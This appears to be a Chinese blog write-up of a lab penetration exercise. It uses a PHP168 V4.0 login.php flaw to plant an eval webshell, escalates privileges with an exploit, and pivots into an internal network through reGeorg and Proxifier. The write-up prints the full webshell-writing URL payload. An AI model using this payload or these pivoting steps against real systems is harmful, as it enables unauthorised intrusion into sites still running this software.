记一次内网渗透

0x01

这次是2组表哥们搭建的靶机，提示还有一个内网靶机。

0x02 信息收集

可以在网页的最底下看到相应的信息

一个2007年的网站，应该会有很多漏洞，百度了一下php168V4.0

果然存在漏洞：利用login.php文件，将一句话木马windy.php缓存到cache目录下。

payload：login.php?makehtml=1&chdb[htmlname]=wind.php&chdb[path]=cache&content=<?php%20@eval($_POST[admin]);?>

0x02 漏洞利用&&提权

执行后再去访问相应的php,没有404，说明我们构造的windy.php已经写入了。

既然已经有了一句话木马，我们就可以直接用菜刀链接到我们上传的php

和以前一样，并没有添加用户权限，后来表哥提供给我了一个win7提权的exp。

将对应版本的exe传入到靶机目录，按照格式执行命令即可。效果拔群！

内网代理

之后我们来看看内网的靶机。

我们需要通过我们刚刚拿下的靶机来进入内网，采用内网代理的方法。

查阅信息，得知了sock5代理（regeorg+proxifier）进入内网的方法。

regeorg可以直接从github获取，proxifier也有各种破解版。

regeorg建立本地到靶机端的链接，通过proxifier设置各种应用的代理。

先配置regeorg：

1.先将regeorg包下自带的tunnel.xxx传入靶机(这里是php运行的，所以我上传的是php)。

如果你访问你上传的网页，显示如下图，说明你可以进入下一步了

2.运行regeorg脚本，-p 为监听端口 -u 对应的tunne.xxx的地址

需要注意的是-u 对应的url一定要加入相应的协议头，否则就会报错。（当时在这一步卡了好久，甚至重装了好几次python）

报错信息：

Traceback (most recent call last):
  File "reGeorgSocksProxy.py", line 412, in <module>
    if not askGeorg(args.url):
  File "reGeorgSocksProxy.py", line 373, in askGeorg
    conn = httpScheme(host=httpHost, port=httpPort)
  File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 763, in _
_init__
    **conn_kw)
  File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 166, in _
_init__
    ConnectionPool.__init__(self, host, port)
  File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 69, in __
init__
    raise LocationValueError("No host specified.")
urllib3.exceptions.LocationValueError: No host specified.

正确开启后这是样的

配置proxifier：

proxifier有两个需要配置的地方，一个是代理服务，一个是代理规则

这个只要按照之前regeorg中设置的配置填就好

但是一定要注意，代理规则的python一定不要打勾！python一定不要打勾！python一定不要打勾！

否则就会形成多重代理，类似死循环，导致服务端卡死orz。

进入内网

之后在内网寻找靶机，突然想起之前看的arp进行局域网攻击，所以用windows自带的arp命令查找了一下局域网的ip，arp -a

发现好像192.168.62.128符合我们的要求，直接浏览器访问。

成功进入内网的靶机。

这个网站并没有入侵思路。

用扫描器扫了一下，发现有一个123.php比较可疑，访问了一下，发现是一个大马，可能是哪个表哥留下的。

如果有那位表哥知道渗透思路的请务必告诉我orz。

参考文章：

• http://www.tuicool.com/articles/JNRn6nY
• https://bbs.ichunqiu.com/thread-12514-1-1.html